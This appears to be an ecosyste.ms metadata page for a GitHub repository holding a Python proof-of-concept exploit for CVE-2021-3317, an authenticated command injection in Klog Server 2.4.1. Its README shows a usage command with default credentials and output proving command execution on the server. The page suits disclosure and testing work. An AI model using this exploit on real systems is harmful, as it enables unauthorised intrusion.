https://github.com/al1ex/cve-2021-3317

CVE-2021-3317
https://github.com/al1ex/cve-2021-3317

cve-2021-3317 exploit klogserver

Last synced: 4 months ago
JSON representation

CVE-2021-3317

Host: GitHub
URL: https://github.com/al1ex/cve-2021-3317
Owner: Al1ex
Created: 2021-04-09T07:36:46.000Z (about 5 years ago)
Default Branch: main
Last Pushed: 2021-04-09T07:37:29.000Z (about 5 years ago)
Last Synced: 2025-06-22T01:41:33.668Z (12 months ago)
Topics: cve-2021-3317, exploit, klogserver
Language: Python
Homepage:
Size: 3.91 KB
Stars: 2
Watchers: 1
Forks: 2
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

## Information
Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)

Date: 26.01.2021

Exploit Author: Metin Yunus Kandemir

Vendor Homepage: https://www.klogserver.com/

Version: 2.4.1

Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection

CVE: 2021-3317

## How to use
```
python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id
[*] Status Code for login request: 302
[+] Authentication was successful!
[*] Exploiting...

uid=48(apache) gid=48(apache) groups=48(apache)
```

## Reference
https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/al1ex/cve-2021-3317

Awesome Lists containing this project

README